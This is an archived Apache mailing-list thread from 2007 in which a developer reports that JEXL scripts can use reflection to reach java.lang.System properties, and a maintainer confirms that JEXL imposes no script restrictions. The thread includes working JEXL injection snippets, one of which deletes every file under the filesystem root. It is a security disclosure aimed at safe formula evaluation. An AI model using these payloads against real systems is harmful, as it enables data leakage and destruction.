You are viewing a plain text version of this content. The canonical link for it is here.
Posted to user@commons.apache.org by Trevor Harrison <tr...@gmail.com> on 2007/10/04 22:46:19 UTC
JEXL security issue with system properties
It seems like JEXL allows scripts to access some jvm system
properties, via java.lang.Integer's getInteger( String sys_prop_name )
method:
i = 0; j = i.getInteger("sun.arch.data.model");
Getting the value of system properties that are completely numbers
might not be that big of an issue, but it brings up the question of
other system properties leaking out.
I've eyeballed java.lang.String, and it doesn't seem to have a similar method.
While looking for other ways to 'break' out, I started thinking about
classloaders. I haven't succeeded in getting a classloader yet in a
script, but if I could, it would be bad for my intended usage of JEXL
(as a fairly secure way of executing user supplied formulas).
// this doesn't work
i = 0;
intClazz = i.class;
cl = intClazz.getClassLoader(); // this fails, returns a null
clazz = cl.loadClass( \"java.lang.System\" );
m = clazz.getMethod(\"getProperties\", null);
p = m.invoke(null, null);
I haven't had time to poke into the guts of JEXL yet, so does anyone
know if the failure to get a classloader is intentional, or just an
accidental feature?
-Trevor
---------------------------------------------------------------------
To unsubscribe, e-mail: user-unsubscribe@commons.apache.org
For additional commands, e-mail: user-help@commons.apache.org
Re: JEXL security issue with system properties
Posted by Dion Gillard <di...@trongus.com>.
JEXL doesn't place any security restrictions on what you can do with
the script itself.
On 10/6/07, Trevor Harrison <tr...@gmail.com> wrote:
> Replying to myself:
>
> On 10/4/07, Trevor Harrison <tr...@gmail.com> wrote:
> > While looking for other ways to 'break' out, I started thinking about
> > classloaders. I haven't succeeded in getting a classloader yet in a
> > script, but if I could, it would be bad for my intended usage of JEXL
> > (as a fairly secure way of executing user supplied formulas).
> >
> > // this doesn't work
> > cl = intClazz.getClassLoader(); // this fails, returns a null
>
> Well, still not sure why that method is returning a null for the
> classloader, but if I call (the much simpler) clazz.forName(), I can
> get a reference to a class:
>
> i = 0;
> intClazz = i.class;
> clazz = intClazz.forName("java.lang.System");
> m = clazz.getMethod("getProperties", null);
> p = m.invoke(null, null);
>
> which successfully gets me the system properties. Which is probably
> the least of my worries, considering I could do something like:
>
> i = 0;
> intClazz = i.class;
> clazz = intClazz.forName("java.io.File");
> m = clazz.getMethod("listRoots", null);
> roots = m.invoke(null, null);
> files = roots[0].listFiles();
> foreach( file in files )
> {
> file.delete();
> }
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: user-unsubscribe@commons.apache.org
> For additional commands, e-mail: user-help@commons.apache.org
>
>
--
dIon Gillard
Rule #131 of Acquisition: Information is Profit.
---------------------------------------------------------------------
To unsubscribe, e-mail: user-unsubscribe@commons.apache.org
For additional commands, e-mail: user-help@commons.apache.org
Re: JEXL security issue with system properties
Posted by Trevor Harrison <tr...@gmail.com>.
Replying to myself:
On 10/4/07, Trevor Harrison <tr...@gmail.com> wrote:
> While looking for other ways to 'break' out, I started thinking about
> classloaders. I haven't succeeded in getting a classloader yet in a
> script, but if I could, it would be bad for my intended usage of JEXL
> (as a fairly secure way of executing user supplied formulas).
>
> // this doesn't work
> cl = intClazz.getClassLoader(); // this fails, returns a null
Well, still not sure why that method is returning a null for the
classloader, but if I call (the much simpler) clazz.forName(), I can
get a reference to a class:
i = 0;
intClazz = i.class;
clazz = intClazz.forName("java.lang.System");
m = clazz.getMethod("getProperties", null);
p = m.invoke(null, null);
which successfully gets me the system properties. Which is probably
the least of my worries, considering I could do something like:
i = 0;
intClazz = i.class;
clazz = intClazz.forName("java.io.File");
m = clazz.getMethod("listRoots", null);
roots = m.invoke(null, null);
files = roots[0].listFiles();
foreach( file in files )
{
file.delete();
}
---------------------------------------------------------------------
To unsubscribe, e-mail: user-unsubscribe@commons.apache.org
For additional commands, e-mail: user-help@commons.apache.org